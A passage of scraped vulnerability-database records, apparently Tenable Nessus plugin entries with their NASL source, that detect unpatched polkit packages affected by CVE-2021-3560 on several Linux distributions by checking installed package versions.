audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'polkit-0.113-5.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'polkit-devel-0.113-5.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T16:00:09", "description": "According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-09-27T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2561)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2561.NASL", "href": "https://www.tenable.com/plugins/nessus/153699", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153699);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2561)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2561\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f2a5e55\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n \"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:42", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 4.0: Polkit PHSA-2021-4.0-0037", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:4.0"], "id": "PHOTONOS_PHSA-2021-4_0-0037_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150283", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-4.0-0037. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150283);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 4.0: Polkit PHSA-2021-4.0-0037\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-4.0-37.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:4.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 4\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 4.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'polkit-0.118-2.ph4')) flag++;\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'polkit-devel-0.118-2.ph4')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:42", "description": "New polkit packages are available for Slackware 14.2 and -current to fix a security issue.", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "Slackware 14.2 / current : polkit (SSA:2021-158-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:polkit", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2021-158-02.NASL", "href": "https://www.tenable.com/plugins/nessus/150337", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2021-158-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150337);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"SSA\", value:\"2021-158-02\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Slackware 14.2 / current : polkit (SSA:2021-158-02)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New polkit packages are available for Slackware 14.2 and -current to\nfix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.342839\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?123a45a7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.2\", pkgname:\"polkit\", pkgver:\"0.113\", pkgarch:\"i586\", pkgnum:\"3_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"polkit\", pkgver:\"0.113\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"polkit\", pkgver:\"0.119\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"polkit\", pkgver:\"0.119\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:51", "description": "The remote Ubuntu 20.04 LTS / 20.10 / 21.04 host has packages installed that are affected by a vulnerability as referenced in the USN-4980-1 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS / 20.10 / 21.04 : polkit vulnerability (USN-4980-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10", "cpe:/o:canonical:ubuntu_linux:21.04", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-polkit-1.0", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-0", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-dev", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-0", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-dev", "p-cpe:/a:canonical:ubuntu_linux:policykit-1"], "id": "UBUNTU_USN-4980-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150164", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4980-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150164);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"USN\", value:\"4980-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Ubuntu 20.04 LTS / 20.10 / 21.04 : polkit vulnerability (USN-4980-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS / 20.10 / 21.04 host has packages installed that are affected by a vulnerability as\nreferenced in the USN-4980-1 advisory. Note that Nessus has not tested for this issue but has instead relied only on the\napplication's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4980-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-polkit-1.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:policykit-1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(20\\.04|20\\.10|21\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04 / 20.10 / 21.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '20.04', 'pkgname': 'gir1.2-polkit-1.0', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-agent-1-0', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-agent-1-dev', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-gobject-1-0', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-gobject-1-dev', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'policykit-1', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'gir1.2-polkit-1.0', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-agent-1-0', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-agent-1-dev', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-gobject-1-0', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-gobject-1-dev', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'policykit-1', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'gir1.2-polkit-1.0', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-agent-1-0', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-agent-1-dev', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-gobject-1-0', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-gobject-1-dev', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'policykit-1', 'pkgver': '0.105-30ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'gir1.2-polkit-1.0 / libpolkit-agent-1-0 / libpolkit-agent-1-dev / etc');\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:30:08", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has polkit packages installed that are affected by a vulnerability:\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-09T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : polkit Vulnerability (NS-SA-2022-0061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:polkit", "p-cpe:/a:zte:cgsl_main:polkit-debuginfo", "p-cpe:/a:zte:cgsl_main:polkit-debugsource", "p-cpe:/a:zte:cgsl_main:polkit-devel", "p-cpe:/a:zte:cgsl_main:polkit-docs", "p-cpe:/a:zte:cgsl_main:polkit-libs", "p-cpe:/a:zte:cgsl_main:polkit-libs-debuginfo", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2022-0061_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/160784", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2022-0061. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160784);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : polkit Vulnerability (NS-SA-2022-0061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has polkit packages installed that are affected by a\nvulnerability:\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2022-0061\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2021-3560\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL polkit packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 